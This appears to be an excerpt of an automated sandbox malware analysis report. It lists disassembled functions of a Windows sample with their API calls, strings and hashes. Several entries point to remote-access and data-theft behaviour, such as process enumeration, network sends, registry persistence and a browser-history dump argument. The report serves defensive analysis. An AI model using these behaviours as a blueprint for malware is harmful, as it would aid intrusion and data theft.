                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 2180151492-0
                                                                                        • Opcode ID: af739ac690ee8d07d81366b8be29f9ccbff63967b6472fc478213852870bed76
                                                                                        • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                                                                        • Opcode Fuzzy Hash: af739ac690ee8d07d81366b8be29f9ccbff63967b6472fc478213852870bed76
                                                                                        • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free
                                                                                        • String ID:
                                                                                        • API String ID: 269201875-0
                                                                                        • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                                        • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                                                                        • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                                        • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                                                                        • _free.LIBCMT ref: 0044F3BF
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 336800556-0
                                                                                        • Opcode ID: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                                                                                        • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                                                                        • Opcode Fuzzy Hash: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                                                                                        • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseHandle$CreatePointerWrite
                                                                                        • String ID:
                                                                                        • API String ID: 1852769593-0
                                                                                        • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                                        • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                                                                        • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                                        • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                                                                                        • _free.LIBCMT ref: 004482D3
                                                                                        • _free.LIBCMT ref: 004482FA
                                                                                        • SetLastError.KERNEL32(00000000), ref: 00448307
                                                                                        • SetLastError.KERNEL32(00000000), ref: 00448310
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free
                                                                                        • String ID:
                                                                                        • API String ID: 3170660625-0
                                                                                        • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                                        • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                                                                        • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                                        • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041C1DD Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                        • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$CloseHandleOpen$FileImageName
                                                                                        • String ID:
                                                                                        • API String ID: 2951400881-0
                                                                                        • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                                                                        • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                                                                        • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                                                                        • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 004509D4
                                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                        • _free.LIBCMT ref: 004509E6
                                                                                        • _free.LIBCMT ref: 004509F8
                                                                                        • _free.LIBCMT ref: 00450A0A
                                                                                        • _free.LIBCMT ref: 00450A1C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                        • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                                                                        • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                        • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00444066
                                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                        • _free.LIBCMT ref: 00444078
                                                                                        • _free.LIBCMT ref: 0044408B
                                                                                        • _free.LIBCMT ref: 0044409C
                                                                                        • _free.LIBCMT ref: 004440AD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                        • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                                                                        • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                        • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044BA37 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 0-263838557
                                                                                        • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                                                                        • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                                                                                        • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                                                                        • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _strpbrk.LIBCMT ref: 0044E738
                                                                                        • _free.LIBCMT ref: 0044E855
                                                                                          • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                                                                          • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                                                                                          • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                        • String ID: *?$.
                                                                                        • API String ID: 2812119850-3972193922
                                                                                        • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                        • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                                                                        • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                        • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountEventTick
                                                                                        • String ID: !D@$NG
                                                                                        • API String ID: 180926312-2721294649
                                                                                        • Opcode ID: a5a641677daa38105cbe42e75e0e2883f17254e83355899c77695e5a9bf74507
                                                                                        • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                                                                        • Opcode Fuzzy Hash: a5a641677daa38105cbe42e75e0e2883f17254e83355899c77695e5a9bf74507
                                                                                        • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                                                                          • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                                                          • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                        • String ID: XQG$NG$PG
                                                                                        • API String ID: 1634807452-3565412412
                                                                                        • Opcode ID: 3fb924593915bbdab49489ab510ca87b68c848884981a2accbe0ae65a1be58bc
                                                                                        • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                                                                        • Opcode Fuzzy Hash: 3fb924593915bbdab49489ab510ca87b68c848884981a2accbe0ae65a1be58bc
                                                                                        • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: `#D$`#D
                                                                                        • API String ID: 885266447-2450397995
                                                                                        • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                                        • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                                                                        • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                                        • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Libraries\nmfsxfjX.pif,00000104), ref: 00443475
                                                                                        • _free.LIBCMT ref: 00443540
                                                                                        • _free.LIBCMT ref: 0044354A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$FileModuleName
                                                                                        • String ID: C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                        • API String ID: 2506810119-1258859749
                                                                                        • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                                        • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                                                                        • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                                        • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044B81F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                                                                                        • GetLastError.KERNEL32 ref: 0044B931
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 2456169464-263838557
                                                                                        • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                                                                        • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                                                                                        • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                                                                        • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                                                                        • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                        • String ID: /sort "Visit Time" /stext "$0NG
                                                                                        • API String ID: 368326130-3219657780
                                                                                        • Opcode ID: 5844705bffbe932e08c9a339546c7ba6e86f4bc1b82537618e6767435229dddb
                                                                                        • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                                                        • Opcode Fuzzy Hash: 5844705bffbe932e08c9a339546c7ba6e86f4bc1b82537618e6767435229dddb
                                                                                        • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 004162F5
                                                                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                                          • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                                          • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                                          • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _wcslen$CloseCreateValue
                                                                                        • String ID: !D@$okmode$PG
                                                                                        • API String ID: 3411444782-3370592832
                                                                                        • Opcode ID: f3a158218bdd67d4c4b1fae7efd00a7e5adabf20f91f0610842615a967fde749
